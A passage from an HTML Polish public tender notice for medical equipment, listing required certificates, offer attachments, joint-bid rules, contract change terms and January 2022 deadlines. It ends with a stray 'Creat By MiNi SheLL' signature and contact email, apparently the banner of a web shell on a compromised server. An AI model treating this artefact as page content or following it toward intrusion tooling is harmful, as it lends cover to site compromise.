internetowych<br/>10.2 Dokumenty potwierdzające dopuszczenie do obrotu i używania na terytorium RP<br/>oferowanego sprzętu zgodnie z Ustawą z dnia 20 maja 2010r. o wyrobach medycznych (t. j. Dz.<br/>U. 2017.poz 211)<br/>a) deklaracji zgodności,<br/>b) certyfikatu wystawionego przez jednostkę notyfikowaną,<br/>c) kopii powiadomienia lub zgłoszenia do Rejestrów wyrobów medycznych i podmiotów<br/>odpowiedzialnych za ich wprowadzenie do obrotu i używania.<br/>Dokumenty wymienione w lit. b) i c) należy załączyć, jeżeli jest to wymagane przepisami Ustawy<br/>z dnia 20 maja 2010r. o wyrobach medycznych (t.j. Dz.U. z 2017 poz. 211). Dokumenty o<br/>których mowa powyżej są składane w formie oryginału lub kopii poświadczonej za zgodność z<br/>oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z<br/>tłumaczeniem na język polski.<br/>10.3 Instrukcję obsługi w języku polskim. Zamawiający dopuszcza dołączenie do oferty instrukcji<br/>obsługi na nośniku danych.<br/>10.4 Wszystkie dokumenty muszą być ważne przez okres na jaki zostanie zawarta umowa. W<br/>przypadku kończącego się terminu ważności dokumentu Wykonawca ma obowiązek dostarczyć<br/>wymagany aktualny dokument w terminie do ostatniego dnia miesiąca poprzedzającego miesiąc<br/>upływu terminu ważności dokumentu przedstawionego w ofercie przez Wykonawcę. W<br/>przypadku gdy dokument traci ważność podczas trwania umowy Wykonawca musi załączyć do<br/>aktualnego dokumentu oświadczenie, że dostarczy przedłużenie dokumentu do siedziby<br/>Zamawiającego. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 11. Pozostałe dokumenty, które Wykonawca składa wraz z ofertą<br/>11.1 Uzupełniony i podpisany dokument pod nazwą formularz oferty - załącznik nr 1 do SWZ<br/>11.2 Uzupełniony i podpisany dokument pod nazwą formularz asortymentowo-cenowy -<br/>załącznik nr 2a, 2b do SWZ<br/>11.3 Dokumenty potwierdzające wykaz 2 dostaw - załącznik nr 5 do SWZ<br/>11.4 Oświadczenie dot. obowiązku podatkowego od towarów i usług - załącznik nr 6 do SWZ<br/>11.5 Uzupełniony wzór umowy o dane Wykonawcy - załącznik nr 7 do SWZ<br/>11.6 Załącznik nr II do projektu umowy - załącznik nr 8 do SWZ,<br/>11.7 Oświadczenie dot. RODO - załącznik nr 9 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 8.1. W przypadku złożenia oferty wspólnej przez kilka podmiotów, każdy z nich zobowiązany jest<br/>przedstawić dokumenty wystawione na niego wymienione w pkt: 7.2.1. – 7.2.2, natomiast<br/>dokumenty wymienione w pkt: 7.1.1.-7.1.3. podmioty składają wspólnie, tj.: warunki w nich<br/>określone są spełnione, gdy podmioty składające ofertę spełniają je łącznie.<br/>8.2. Oferta wspólna musi zostać przygotowana i złożona w następujący sposób:<br/>8.2.1. podmioty wspólnie składające ofertę ustanawiają i wskazują Pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania<br/>w postępowaniu o<br/>udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego - DO<br/>OFERTY NALEŻY DOŁĄCZYĆ PEŁNOMOCNICTWO,<br/>8.2.2. oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty<br/>wspólnie składające ofertę ;<br/>8.2.3. każdy z podmiotów składających wspólnie ofertę musi złożyć oświadczenie, że nie<br/>podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 ustawy Pzp- ZAŁĄCZNIK NR<br/>4 DO SWZ.<br/>8.3. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>8.4. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie<br/>uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia są zobowiązani dostarczyć Zamawiającemu stosowną kopię umowy regulującej współpracę tych<br/>Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 7. Zamawiający przewiduje zmianę postanowień zawartej umowy z uwzględnieniem zapisów art.<br/>455 ust. 1 pkt 1 ustawy Pzp (Dz.U. z 2019r., poz. 2019 z późn. zm.),w stosunku do treści oferty<br/>na podstawie, której dokonano wyboru Wykonawcy oraz określa warunki tych zmian poprzez<br/>wprowadzenie do zawartej umowy następujących aneksów:<br/>a) Wykonawca zobowiązany jest do informowania Zamawiającego w okresie obowiązywania<br/>umowy o wszystkich zmianach wprowadzonych do przedmiotu umowy lub wycofaniu z<br/>produkcji. Wykonawca zobowiązany jest, w przypadku zaistnienia okoliczności, o których mowa<br/>w zdaniu poprzednim, do zaproponowania zamiennika, pod warunkiem, że cena zamiennika nie<br/>przekracza ceny przedmiotu umowy oraz spełnia parametry określone przez Zamawiającego.<br/>b) Zamawiający zobowiązuje się do zrealizowania przedmiotu umowy w wysokości 100%<br/>wartości brutto umowy określonej w § 3 ust. 1.<br/>c) Zamawiający przewiduje zmianę umowy gdy nowy Wykonawca ma zastąpić<br/>dotychczasowego Wykonawcę w wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy,<br/>w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji,<br/>dziedziczenia, lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy<br/>Wykonawca spełnia warunki udziału w postępowaniu oraz nie pociąga to za sobą innych<br/>istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. Otwarcie ofert nastąpi w siedzibie Zamawiającego poprzez odszyfrowanie ofert na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-21 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 9. Wykonawcy mający siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej, składa:<br/>9.1.1. oświadczenia i dokumenty o których mowa w pkt . 7.1.<br/>9.1.2. oświadczenie o którym mowa w pkt 7.2.1.<br/>9.1.2. ppkt 7.2.2 - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca<br/>ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej<br/>tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca<br/>wszczęcia tej procedury.

Creat By MiNi SheLL
Email: jattceo@gmail.com